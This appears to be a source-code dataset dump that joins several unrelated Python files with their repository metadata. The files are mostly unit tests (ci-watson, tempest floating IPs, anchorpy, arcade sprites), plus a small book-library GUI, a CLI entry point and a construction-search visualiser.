.. note:: Upload schema functions are tested separately elsewhere.
"""
def setup_class(self):
self.inpath = ('ci-watson', 'dev', 'input')
if os.environ.get('TEST_BIGDATA').startswith('http'):
self.copy = True
else:
self.copy = False
def test_raise_error_fits(self):
"""Test mismatched extensions from the same file."""
get_bigdata(*self.inpath, 'j6lq01010_asn.fits', docopy=True)
outputs = [('j6lq01010_asn.fits[PRIMARY]', 'j6lq01010_asn.fits[asn]')]
with pytest.raises(AssertionError) as exc:
compare_outputs(outputs, input_path=self.inpath,
docopy=self.copy, verbose=False)
assert 'Headers contain differences' in str(exc)
def test_difference_ascii(self):
"""
Test ASCII with differences but suppress error to inspect
returned report.
"""
get_bigdata(*self.inpath, 'j6lq01010_asn_mod.txt', docopy=True)
report = compare_outputs(
[('j6lq01010_asn_mod.txt', 'j6lq01010_asn.txt')],
input_path=self.inpath, docopy=self.copy, verbose=False,
raise_error=False)
s = report.split(os.linesep)
assert s[2:] == ['@@ -1,4 +1,4 @@',
' # MEMNAME MEMTYPE MEMPRSNT',
'-J6LQ01NAQ EXP-CRJ 2',
'+J6LQ01NAQ EXP-CRJ 1',
' J6LQ01NDQ EXP-CRJ 1',
'-J6LQ01013 PROD-RPT 1',
'+J6LQ01011 PROD-CRJ 1',
'']
@pytest.mark.parametrize(
'filename', ['j6lq01010_asn.fits', 'j6lq01010_asn.txt'])
def test_all_okay(self, filename):
"""Same file has no difference."""
get_bigdata(*self.inpath, filename, docopy=True)
report = compare_outputs(
[(filename, filename)], input_path=self.inpath,
docopy=self.copy, verbose=False)
assert 'No differences found' in report
@pytest.mark.parametrize('docopy', [False, True])
def test_truth_missing(self, docopy):
get_bigdata(*self.inpath, 'j6lq01010_asn.fits', docopy=True)
with pytest.raises(AssertionError) as exc:
compare_outputs(
[('j6lq01010_asn.fits', 'doesnotexist.fits')],
input_path=self.inpath, docopy=docopy, verbose=False)
assert 'Cannot find doesnotexist.fits' in str(exc)
@pytest.mark.parametrize(
'outputs',
[[('j6lq01010_asn.fits[ASN]', 'j6lq01010_asn_mod.fits', ['image'])],
[('j6lq01010_asn.fits', 'j6lq01010_asn_mod.fits[ASN]', ['image'])]])
def test_ambiguous_extlist(self, outputs):
"""Too many ways to do the same thing."""
get_bigdata(*self.inpath, 'j6lq01010_asn.fits', docopy=True)
with pytest.raises(AssertionError) as exc:
compare_outputs(outputs, input_path=self.inpath, docopy=self.copy,
verbose=False)
assert 'Ambiguous extension requirements' in str(exc)
def test_mixed_bunch(self):
"""
Test different forms of acceptable ``outputs``.
.. note:: Some other crazy combos are theoretically possible given
the logic but they are not officially supported, hence
not tested here. Add new combo as its support is added.
"""
for filename in ('j6lq01010_asn.fits', 'j6lq01010_asn.txt'):
get_bigdata(*self.inpath, filename, docopy=True)
outputs = [('j6lq01010_asn.fits', 'j6lq01010_asn.fits'),
('j6lq01010_asn.fits[asn]', 'j6lq01010_asn.fits[ASN]'),
{'files': ('j6lq01010_asn.fits[image]',
'j6lq01010_asn_mod.fits[IMAGE]'),
'pars': {'rtol': 1e-7, 'atol': 0.05}},
{'files': ('j6lq01010_asn.fits',
'j6lq01010_asn_mod.fits',
['image']),
'pars': {'rtol': 1e-7, 'atol': 0.05}},
{'files': ('j6lq01010_asn.txt', 'j6lq01010_asn.txt')},
('j6lq01010_asn.fits', 'j6lq01010_asn_mod.fits',
['primary', 'IMAGE']),
('j6lq01010_asn.txt', 'j6lq01010_asn.txt')]
report = compare_outputs(
outputs, input_path=self.inpath, docopy=self.copy,
verbose=False, raise_error=False)
# There are 7 comparisons, and only 1 should show a difference
assert report.count("No differences found") == 6
assert report.count("different pixels found") == 1
class TestGenerateUploadParams:
def setup_class(self):
self.old_envs = {}
for key in ('BUILD_TAG', 'BUILD_MATRIX_SUFFIX'):
self.old_envs[key] = os.environ.get(key)
# Set up something reproducible
os.environ['BUILD_TAG'] = 'tag0'
os.environ['BUILD_MATRIX_SUFFIX'] = 'foo'
def teardown_class(self):
for key, val in self.old_envs.items():
if val is None:
del os.environ[key]
else:
os.environ[key] = val
def test_gen(self, _jail):
# Dummy file to move.
datafile = 'actual.txt'
with open(datafile, 'w') as f:
f.write('\n')
updated_outputs = [(datafile, '/path/to/desired.txt')]
schema_pattern, tree, testname = generate_upload_params(
'groot', updated_outputs, verbose=False)
assert schema_pattern == ['*.log', os.path.abspath('desired.txt')]
assert isinstance(testname, str) # Actual value non-deterministic
# TODO: Use regex?
split_tree = tree.split(os.sep)
assert split_tree[0] == 'groot'
assert split_tree[1].endswith('_tag0_foo')
assert split_tree[3] == ''
# Make sure file is moved properly.
dirlist = os.listdir()
assert dirlist == ['desired.txt']
def test_generate_upload_schema_multi(_jail):
generate_upload_schema(
['*.log', 'desired.txt'], 'reponame/repopath', 'foo')
# TODO: Better way to compare JSON?
with open('foo_results.json') as f:
j = json.load(f)
assert json.dumps(j, indent=4, sort_keys=True).split(os.linesep) == [
'{',
' "files": [',
' {',
' "excludePatterns": [],',
' "explode": "false",',
' "flat": "true",',
' "pattern": "*.log",',
' "props": null,',
' "recursive": "false",',
' "regexp": "false",',
' "target": "reponame/repopath"',
' },',
' {',
' "excludePatterns": [],',
' "explode": "false",',
' "flat": "true",',
' "pattern": "desired.txt",',
' "props": null,',
' "recursive": "false",',
' "regexp": "false",',
' "target": "reponame/repopath"',
' }',
' ]',
'}']
def test_generate_upload_schema_one(_jail):
generate_upload_schema(
'desired.txt', 'reponame/repopath', 'foo', recursive=True)
# TODO: Better way to compare JSON?
with open('foo_results.json') as f:
j = json.load(f)
assert json.dumps(j, indent=4, sort_keys=True).split(os.linesep) == [
'{',
' "files": [',
' {',
' "excludePatterns": [],',
' "explode": "false",',
' "flat": "true",',
' "pattern": "desired.txt",',
' "props": null,',
' "recursive": "true",',
' "regexp": "false",',
' "target": "reponame/repopath"',
' }',
' ]',
'}']
| 36.752508 | 79 | 0.557922 | 1,211 | 10,989 | 4.921552 | 0.247729 | 0.066443 | 0.051007 | 0.029362 | 0.435067 | 0.367953 | 0.307718 | 0.28255 | 0.265268 | 0.241779 | 0 | 0.033439 | 0.308763 | 10,989 | 298 | 80 | 36.875839 | 0.751185 | 0.11466 | 0 | 0.419355 | 0 | 0 | 0.252485 | 0.032228 | 0 | 0 | 0 | 0.003356 | 0.115207 | 1 | 0.105991 | false | 0 | 0.018433 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8f1c240711d8e04a35bb7689d16fee5a9b85ef7 | 1,508 | py | Python | MyLibrary.py | peternewman22/MyLibrary | edd584244ddc4675947f5c89f05e0dfc88145d20 | [
"MIT"
] | null | null | null | MyLibrary.py | peternewman22/MyLibrary | edd584244ddc4675947f5c89f05e0dfc88145d20 | [
"MIT"
] | null | null | null | MyLibrary.py | peternewman22/MyLibrary | edd584244ddc4675947f5c89f05e0dfc88145d20 | [
"MIT"
] | null | null | null | from decouple import config
import csv
from datetime import datetime
import logging
from Gui import Gui
import PySimpleGUI as sg
# logging.basicConfig(filename = 'mylibrary.log', filemode = 'w', level=logging.DEBUG, format='%(asctime)s - %(message)s')
class MyLibrary:
def __init__(self, debugOn):
self.debugOn = debugOn
self.filename = sg.popup_get_file('Choose a document to save to')
self.apiKey = config('KEY')
self.metadata = ["isbn", "title", "subtitle", "authors", "edition", "pageCount", "categories", "averageRating", "ratingsCount", "publishedDate", "publisher", "description"]
def constructRow(self, data):
"""Constructs row in the order of metadat"""
return list(map(lambda datapoint: data[datapoint], self.metadata))
def write2csv(self, row):
"""Writes to csv"""
with open(self.filename, 'a', newline='', encoding='utf8') as csv_file:
writer=csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
writer.writerow(row)
def run(self):
self.write2csv([f"Session started: {datetime.now()}"]) #timestamping session
self.write2csv(self.metadata) # writing headers
while True:
gui = Gui(self.apiKey, self.metadata, self.debugOn)
if gui.data['Quit'] == True: # checking to see if Quit thing works
break
else:
row = self.constructRow(gui.data)
self.write2csv(row) | 41.888889 | 180 | 0.636605 | 176 | 1,508 | 5.403409 | 0.551136 | 0.050473 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004318 | 0.232095 | 1,508 | 36 | 181 | 41.888889 | 0.816926 | 0.163793 | 0 | 0 | 0 | 0 | 0.146635 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8f2e5a4f86d70234c1d81d00f7958c8610a8ac6 | 6,282 | py | Python | tempest/tests/lib/services/network/test_floating_ips_client.py | cityofships/tempest | 59aa6811a3664d88b8939603b8e974644fbe21fa | [
"Apache-2.0"
] | 254 | 2015-01-05T19:22:52.000Z | 2022-03-29T08:14:54.000Z | tempest/tests/lib/services/network/test_floating_ips_client.py | cityofships/tempest | 59aa6811a3664d88b8939603b8e974644fbe21fa | [
"Apache-2.0"
] | 13 | 2015-03-02T15:53:04.000Z | 2022-02-16T02:28:14.000Z | tempest/tests/lib/services/network/test_floating_ips_client.py | cityofships/tempest | 59aa6811a3664d88b8939603b8e974644fbe21fa | [
"Apache-2.0"
] | 367 | 2015-01-07T15:05:39.000Z | 2022-03-04T09:50:35.000Z | # Copyright 2017 AT&T Corporation.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from tempest.lib.services.network import floating_ips_client
from tempest.tests.lib import fake_auth_provider
from tempest.tests.lib.services import base
class TestFloatingIPsClient(base.BaseServiceTest):
FAKE_FLOATING_IPS = {
"floatingips": [
{
"router_id": "d23abc8d-2991-4a55-ba98-2aaea84cc72f",
"description": "for test",
"dns_domain": "my-domain.org.",
"dns_name": "myfip",
"created_at": "2016-12-21T10:55:50Z",
"updated_at": "2016-12-21T10:55:53Z",
"revision_number": 1,
"project_id": "4969c491a3c74ee4af974e6d800c62de",
"tenant_id": "4969c491a3c74ee4af974e6d800c62de",
"floating_network_id": "376da547-b977-4cfe-9cba-275c80debf57",
"fixed_ip_address": "10.0.0.3",
"floating_ip_address": "172.24.4.228",
"port_id": "ce705c24-c1ef-408a-bda3-7bbd946164ab",
"id": "2f245a7b-796b-4f26-9cf9-9e82d248fda7",
"status": "ACTIVE",
"port_details": {
"status": "ACTIVE",
"name": "",
"admin_state_up": True,
"network_id": "02dd8479-ef26-4398-a102-d19d0a7b3a1f",
"device_owner": "compute:nova",
"mac_address": "fa:16:3e:b1:3b:30",
"device_id": "8e3941b4-a6e9-499f-a1ac-2a4662025cba"
},
"tags": ["tag1,tag2"],
"port_forwardings": []
},
{
"router_id": None,
"description": "for test",
"dns_domain": "my-domain.org.",
"dns_name": "myfip2",
"created_at": "2016-12-21T11:55:50Z",
"updated_at": "2016-12-21T11:55:53Z",
"revision_number": 2,
"project_id": "4969c491a3c74ee4af974e6d800c62de",
"tenant_id": "4969c491a3c74ee4af974e6d800c62de",
"floating_network_id": "376da547-b977-4cfe-9cba-275c80debf57",
"fixed_ip_address": None,
"floating_ip_address": "172.24.4.227",
"port_id": None,
"id": "61cea855-49cb-4846-997d-801b70c71bdd",
"status": "DOWN",
"port_details": None,
"tags": ["tag1,tag2"],
"port_forwardings": []
}
]
}
FAKE_FLOATING_IP_ID = "2f245a7b-796b-4f26-9cf9-9e82d248fda7"
def setUp(self):
super(TestFloatingIPsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.floating_ips_client = floating_ips_client.FloatingIPsClient(
fake_auth, "compute", "regionOne")
def _test_list_floatingips(self, bytes_body=False):
self.check_service_client_function(
self.floating_ips_client.list_floatingips,
"tempest.lib.common.rest_client.RestClient.get",
self.FAKE_FLOATING_IPS,
bytes_body,
200)
def _test_create_floatingip(self, bytes_body=False):
self.check_service_client_function(
self.floating_ips_client.create_floatingip,
"tempest.lib.common.rest_client.RestClient.post",
{"floatingip": self.FAKE_FLOATING_IPS["floatingips"][1]},
bytes_body,
201,
floating_network_id="172.24.4.228")
def _test_show_floatingip(self, bytes_body=False):
self.check_service_client_function(
self.floating_ips_client.show_floatingip,
"tempest.lib.common.rest_client.RestClient.get",
{"floatingip": self.FAKE_FLOATING_IPS["floatingips"][0]},
bytes_body,
200,
floatingip_id=self.FAKE_FLOATING_IP_ID)
def _test_update_floatingip(self, bytes_body=False):
update_kwargs = {
"port_id": "fc861431-0e6c-4842-a0ed-e2363f9bc3a8"
}
resp_body = {
"floatingip": copy.deepcopy(
self.FAKE_FLOATING_IPS["floatingips"][0]
)
}
resp_body["floatingip"].update(update_kwargs)
self.check_service_client_function(
self.floating_ips_client.update_floatingip,
"tempest.lib.common.rest_client.RestClient.put",
resp_body,
bytes_body,
200,
floatingip_id=self.FAKE_FLOATING_IP_ID,
**update_kwargs)
def test_list_floatingips_with_str_body(self):
self._test_list_floatingips()
def test_list_floatingips_with_bytes_body(self):
self._test_list_floatingips(bytes_body=True)
def test_create_floatingip_with_str_body(self):
self._test_create_floatingip()
def test_create_floatingip_with_bytes_body(self):
self._test_create_floatingip(bytes_body=True)
def test_show_floatingips_with_str_body(self):
self._test_show_floatingip()
def test_show_floatingips_with_bytes_body(self):
self._test_show_floatingip(bytes_body=True)
def test_update_floatingip_with_str_body(self):
self._test_update_floatingip()
def test_update_floatingip_with_bytes_body(self):
self._test_update_floatingip(bytes_body=True)
def test_delete_floatingip(self):
self.check_service_client_function(
self.floating_ips_client.delete_floatingip,
'tempest.lib.common.rest_client.RestClient.delete',
{},
status=204,
floatingip_id=self.FAKE_FLOATING_IP_ID)
| 38.304878 | 78 | 0.607291 | 680 | 6,282 | 5.3 | 0.317647 | 0.039956 | 0.037736 | 0.035516 | 0.553274 | 0.493063 | 0.368757 | 0.220588 | 0.220588 | 0.192286 | 0 | 0.089606 | 0.289398 | 6,282 | 163 | 79 | 38.539877 | 0.717742 | 0.095989 | 0 | 0.244094 | 0 | 0 | 0.268008 | 0.126589 | 0 | 0 | 0 | 0 | 0 | 1 | 0.110236 | false | 0 | 0.031496 | 0 | 0.165354 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8f732aa0326f3a235a799ebf50e051d05c5952e | 2,277 | py | Python | tests/test_composite.py | snuderl/anchorpy | cd6895bf2f171a79ac70618b79745668581df299 | [
"MIT"
] | 1 | 2022-01-06T07:42:36.000Z | 2022-01-06T07:42:36.000Z | tests/test_composite.py | snuderl/anchorpy | cd6895bf2f171a79ac70618b79745668581df299 | [
"MIT"
] | null | null | null | tests/test_composite.py | snuderl/anchorpy | cd6895bf2f171a79ac70618b79745668581df299 | [
"MIT"
] | null | null | null | """Mimics anchor/tests/composite/tests/composite.js."""
from pytest import mark, fixture
from solana.keypair import Keypair
from solana.sysvar import SYSVAR_RENT_PUBKEY
from anchorpy import Program, Context
from anchorpy.workspace import WorkspaceType
from anchorpy.pytest_plugin import workspace_fixture
workspace = workspace_fixture("anchor/tests/composite/")
@fixture(scope="module")
def program(workspace: WorkspaceType) -> Program:
"""Create a Program instance."""
return workspace["composite"]
@fixture(scope="module")
async def initialized_accounts(program: Program) -> tuple[Keypair, Keypair]:
"""Generate keypairs and use them when callling the initialize function."""
dummy_a = Keypair()
dummy_b = Keypair()
await program.rpc["initialize"](
ctx=Context(
accounts={
"dummy_a": dummy_a.public_key,
"dummy_b": dummy_b.public_key,
"rent": SYSVAR_RENT_PUBKEY,
},
signers=[dummy_a, dummy_b],
pre_instructions=[
await program.account["DummyA"].create_instruction(dummy_a),
await program.account["DummyB"].create_instruction(dummy_b),
],
),
)
return dummy_a, dummy_b
@fixture(scope="module")
async def composite_updated_accounts(
program: Program,
initialized_accounts: tuple[Keypair, Keypair],
) -> tuple[Keypair, Keypair]:
"""Run composite_update and return the keypairs used."""
dummy_a, dummy_b = initialized_accounts
ctx = Context(
accounts={
"foo": {"dummy_a": dummy_a.public_key},
"bar": {"dummy_b": dummy_b.public_key},
},
)
await program.rpc["composite_update"](1234, 4321, ctx=ctx)
return initialized_accounts
@mark.asyncio
async def test_composite_update(
program: Program,
composite_updated_accounts: tuple[Keypair, Keypair],
) -> None:
"""Test that the call to composite_update worked."""
dummy_a, dummy_b = composite_updated_accounts
dummy_a_account = await program.account["DummyA"].fetch(dummy_a.public_key)
dummy_b_account = await program.account["DummyB"].fetch(dummy_b.public_key)
assert dummy_a_account.data == 1234
assert dummy_b_account.data == 4321
| 32.528571 | 79 | 0.681599 | 269 | 2,277 | 5.542751 | 0.275093 | 0.052314 | 0.044266 | 0.032193 | 0.105298 | 0.070423 | 0 | 0 | 0 | 0 | 0 | 0.008879 | 0.208608 | 2,277 | 69 | 80 | 33 | 0.818535 | 0.033377 | 0 | 0.169811 | 0 | 0 | 0.068759 | 0.01146 | 0 | 0 | 0 | 0 | 0.037736 | 1 | 0.018868 | false | 0 | 0.113208 | 0 | 0.188679 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8f977f69610ce02d3e547646c38544aaa91abfe | 2,882 | py | Python | tests/unit2/test_sprite_animated_old.py | yegarti/arcade | 1862e61aab9a7dc646265005b0e808d953a9dfe3 | [
"MIT"
] | 824 | 2016-01-07T19:27:57.000Z | 2020-08-01T03:15:47.000Z | tests/unit2/test_sprite_animated_old.py | yegarti/arcade | 1862e61aab9a7dc646265005b0e808d953a9dfe3 | [
"MIT"
] | 646 | 2016-01-08T02:42:31.000Z | 2020-08-03T14:13:27.000Z | tests/unit2/test_sprite_animated_old.py | yegarti/arcade | 1862e61aab9a7dc646265005b0e808d953a9dfe3 | [
"MIT"
] | 221 | 2016-01-07T22:36:33.000Z | 2020-07-24T23:30:08.000Z | import pytest
import arcade
COIN_SCALE = 0.5
frame_count = 0
def test_sprite_animated_old(window: arcade.Window):
global frame_count
frame_count = 0
SCREEN_WIDTH = window.width
SCREEN_HEIGHT = window.height
arcade.set_background_color(arcade.color.AMAZON)
character_list = arcade.SpriteList()
player = arcade.AnimatedWalkingSprite()
player.scale = 1
player.stand_right_textures = []
player.stand_right_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_idle.png"))
player.stand_left_textures = []
player.stand_left_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_idle.png", flipped_horizontally=True))
player.walk_right_textures = []
player.walk_right_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk0.png"))
player.walk_right_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk1.png"))
player.walk_right_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk2.png"))
player.walk_right_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk3.png"))
player.walk_left_textures = []
player.walk_left_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk0.png",
flipped_horizontally=True))
player.walk_left_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk1.png",
flipped_horizontally=True))
player.walk_left_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk2.png",
flipped_horizontally=True))
player.walk_left_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk3.png",
flipped_horizontally=True))
player.texture_change_distance = 20
player.center_x = SCREEN_WIDTH // 2
player.center_y = SCREEN_HEIGHT // 2
player.scale = 0.8
player.change_x = 2
player.texture = player.stand_left_textures[0]
character_list.append(player)
def on_draw():
arcade.start_render()
character_list.draw()
def update(delta_time):
global frame_count
frame_count += 1
if frame_count == 70:
player.change_x *= -1
character_list.update()
character_list.update_animation(delta_time)
window.on_draw = on_draw
window.update = update
window.test(150)
| 36.481013 | 132 | 0.72415 | 334 | 2,882 | 5.922156 | 0.212575 | 0.070779 | 0.101112 | 0.121335 | 0.64004 | 0.59909 | 0.582406 | 0.582406 | 0.582406 | 0.582406 | 0 | 0.011925 | 0.185288 | 2,882 | 78 | 133 | 36.948718 | 0.830494 | 0 | 0 | 0.262295 | 0 | 0 | 0.256072 | 0.256072 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04918 | false | 0 | 0.032787 | 0 | 0.081967 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8fb3ed9979c05dd8fcbf25c60a7190b391575b1 | 1,185 | py | Python | src/runControl/cli.py | medvir/runControl | 96143adb1cad895098dacc587ff4d665697f2f43 | [
"MIT"
] | null | null | null | src/runControl/cli.py | medvir/runControl | 96143adb1cad895098dacc587ff4d665697f2f43 | [
"MIT"
] | null | null | null | src/runControl/cli.py | medvir/runControl | 96143adb1cad895098dacc587ff4d665697f2f43 | [
"MIT"
] | 1 | 2019-08-08T11:23:27.000Z | 2019-08-08T11:23:27.000Z | # -*- coding: utf-8 -*-
"""The command line file
"""
import argparse
import sys
from pkg_resources import (get_distribution, DistributionNotFound)
try:
__version__ = get_distribution('runControl').version
except DistributionNotFound:
__version__ = 'unknown'
# Parse command line
parser = argparse.ArgumentParser()
# First define all option groups
group1 = parser.add_argument_group('Input file', 'Required input')
group1.add_argument("-f", "--csv", default="", type=str, dest="f",
help="input reads in csv format")
group1.add_argument('-v', '--version', action='version',
version=__version__)
# Exit if no input file is provided
if len(sys.argv) == 1:
parser.print_help()
sys.exit()
def main(args=None):
import logging
import logging.handlers
args = parser.parse_args(args=args)
log_format = '%(levelname)s %(asctime)s %(filename)s: %(funcName)s() %(lineno)d: \t%(message)s'
logging.basicConfig(filename='runko.log', level=logging.INFO,
format=log_format, datefmt='%Y/%m/%d %H:%M:%S')
logging.info(' '.join(sys.argv))
from runControl import run
run.main(args.f)
| 26.931818 | 99 | 0.661603 | 151 | 1,185 | 5.039735 | 0.543046 | 0.043364 | 0.044678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005219 | 0.191561 | 1,185 | 43 | 100 | 27.55814 | 0.789144 | 0.108017 | 0 | 0 | 0 | 0.038462 | 0.190249 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.230769 | 0 | 0.269231 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8ff115bca47b4c097934126e0dc09854f98fc3b | 5,562 | py | Python | archive/2021-03-7/tools/cx_analysis/search.py | CambridgeSemiticsLab/BH_time_collocations | 2d1864b6e9cd26624c769ee1e970d69d19da7fbf | [
"CC-BY-4.0"
] | 5 | 2019-06-19T19:42:21.000Z | 2021-04-20T22:43:45.000Z | archive/2021-03-7/tools/cx_analysis/search.py | CambridgeSemiticsLab/BHTenseAndAspect | 2d1864b6e9cd26624c769ee1e970d69d19da7fbf | [
"CC-BY-4.0"
] | 2 | 2020-02-25T10:19:40.000Z | 2020-03-13T15:29:01.000Z | archive/2021-03-7/tools/cx_analysis/search.py | CambridgeSemiticsLab/BHTenseAndAspect | 2d1864b6e9cd26624c769ee1e970d69d19da7fbf | [
"CC-BY-4.0"
] | null | null | null | import random
import itertools
import networkx as nx
from IPython.display import display, HTML
from datetime import datetime
from pprint import pprint
from .cx import Construction
class SearchCX:
"""Methods for visualizing construction objects with TF"""
def __init__(self, tf_app):
"""Set up TF methods for class-wide use"""
api = tf_app.api
self.F,self.T,self.L = api.F, api.T, api.L
self.app = tf_app
def pretty(self, obj, condense='phrase', **kwargs):
"""Show a linguistic object that is not native to TF app."""
L = self.L
A = self.app
index = kwargs.get('index')
kwargs = {k:v for k,v in kwargs.items() if k not in {'index'}}
show = L.d(obj, condense) if index is None else (L.d(obj, condense)[index],)
print(show, not index, index)
A.prettyTuple(show, seq=kwargs.get('seq', obj), **kwargs)
def prettyconds(self, cx):
'''
Iterate through an explain dict for a rela
and print out all of checked conditions.
'''
cx_tree = [
n for n in nx.bfs_tree(cx.graph, cx)
if type(n) == Construction
]
for node in cx_tree:
print(f'-- {node} --')
for case in node.cases:
print(f'pattern: {case.get("pattern", case["name"])}')
for cond, value in case['conds'].items():
print('{:<30} {:>30}'.format(cond, str(value)))
print()
def showcx(self, cx, conds=False, **kwargs):
"""Display a construction object with TF.
Calls TF.show() with HTML highlights for
words/stretch of words that serve a role
within the construction.
"""
L = self.L
A = self.app
def get_phrase(slot):
timephrase = L.u(slot,'timephrase')
if timephrase:
return timephrase[0]
else:
return L.u(slot,'phrase')[0]
# get slots for display
refslots = cx.slots if cx.slots else cx.element.slots
showcontext = tuple(set(L.u(s, 'phrase')[0] for s in refslots))
timephrase = get_phrase(refslots[0])
params = kwargs
params['extraFeatures'] = params.get('extraFeatures','sp st lex')
params['withNodes'] = params.get('withNodes', True)
params['seq'] = f'{timephrase} -> {cx}'
if not cx:
print('NO MATCHES')
print('-'*20)
A.prettyTuple(showcontext, **params)
if conds:
self.prettyconds(cx)
return None
colors = itertools.cycle([
'#96ceb4', '#ffeead', '#ffcc5c', '#ff6f69',
'#bccad6', '#8d9db6', '#667292', '#f1e3dd',
])
highlights = {}
role2color = {}
for node in cx.graph.adj[cx]:
role = cx.graph[cx][node]['role']
slots = cx.getslots(node)
color = next(colors)
role2color[role] = color
for slot in slots:
highlights[slot] = color
params['highlights'] = highlights
A.prettyTuple(
showcontext,
**params
)
# reveal color meanings
for role,color in role2color.items():
colmean = '<div style="background: {}; text-align: center">{}</div>'.format(color, role)
display(HTML(colmean))
pprint(cx.unfoldroles(), indent=4)
print()
if conds:
self.prettyconds(cx)
display(HTML('<hr>'))
def search(self, elements, cxtest, pattern='',
show=None, end=None, shuffle=True,
updatei=1000, select=None, **kwargs):
"""Search phrases for a specified relation"""
start = datetime.now()
print('beginning search')
# random shuffle to get good diversity of examples
if shuffle:
random.shuffle(elements)
matches = []
# iterate and find matches on words
for i,el in enumerate(elements):
# update every 5000 iterations
if i%updatei == 0:
print(f'\t{len(matches)} found ({i}/{len(elements)})')
# run test for construction
test = cxtest(el)
# save results
if test:
if pattern:
if test.pattern == pattern:
matches.append(test)
else:
matches.append(test)
# stop at end
if end and len(matches) == end:
break
# display
print('done at', datetime.now() - start)
print(len(matches), 'matches found...')
if show:
print(f'showing top {show}')
# option for filtering results
if select:
matches = [m for m in matches if select(m)]
print(f'\tresults filtered to {len(matches)}')
for match in matches[:show]:
self.showcx(match, **kwargs)
return matches
# NB: For the future. Here is a template to plot
# a network graph using networkx.
# graph = GIVE GRAPH HERE
# plt.figure(figsize=(10,5))
# pos = nx.drawing.spectral_layout(graph)
# nx.draw_networkx(graph, pos)
# edge_labels = {
# (n1,n2):graph[n1][n2]['role']
# for n1,n2 in graph.edges
# }
# nx.draw_networkx_edge_labels(graph, pos, font_size=10, edge_labels=edge_labels)
# plt.show()
| 30.729282 | 100 | 0.529486 | 649 | 5,562 | 4.505393 | 0.337442 | 0.01026 | 0.004104 | 0.004788 | 0.025992 | 0.009576 | 0 | 0 | 0 | 0 | 0 | 0.014673 | 0.350593 | 5,562 | 180 | 101 | 30.9 | 0.794851 | 0.186624 | 0 | 0.126126 | 0 | 0 | 0.106277 | 0.004759 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.063063 | 0 | 0.162162 | 0.144144 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3300c1bad34bb6227e54c8b071cf977586ed7f3c | 1,014 | py | Python | apetools/builders/subbuilders/setupiterationbuilder.py | rsnakamura/oldape | b4d1c77e1d611fe2b30768b42bdc7493afb0ea95 | [
"Apache-2.0"
] | null | null | null | apetools/builders/subbuilders/setupiterationbuilder.py | rsnakamura/oldape | b4d1c77e1d611fe2b30768b42bdc7493afb0ea95 | [
"Apache-2.0"
